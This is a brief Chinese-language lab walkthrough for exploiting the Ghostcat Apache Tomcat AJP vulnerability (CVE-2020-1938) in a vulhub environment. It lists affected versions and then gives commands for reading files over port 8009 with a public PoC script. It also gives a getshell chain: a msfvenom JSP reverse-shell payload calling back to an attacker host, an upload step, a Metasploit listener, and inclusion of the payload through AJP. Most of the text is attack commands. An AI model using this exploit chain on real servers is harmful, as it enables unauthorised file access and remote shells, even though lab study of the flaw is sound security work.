type
status
date
slug
summary
tags
category
icon
password
工具:
环境搭建:
vulhub tomacat/cve-2020-1938
影响版本:
Apache Tomcat 6Apache Tomcat 7 < 7.0.100Apache Tomcat 8 < 8.5.51Apache Tomcat 9 < 9.0.31
1. 文件读取
读取8009端口下的web.xml文件
python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.110.132 -p 8009 -f /WEB-INF/web.xml
进入vulhub新建1.txt,并读取
cd /usr/local/tomcat/webapps/ROOT/WEB-INF
echo "123" > 1.txt
python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.110.132 -p 8009 -f /WEB-INF/1.txt

2.文件包含getshell
利用msfvenom生成大马
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=port -f raw 1.jsp
找上传点将jsp传入服务器并修改后缀为1.txt
msf开启监听:
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST=ip
set LPORT=port
run
项目地址:
运行:
python2 poc.py -p 8009 -f "/WEB-INF/1.txt" 目的ip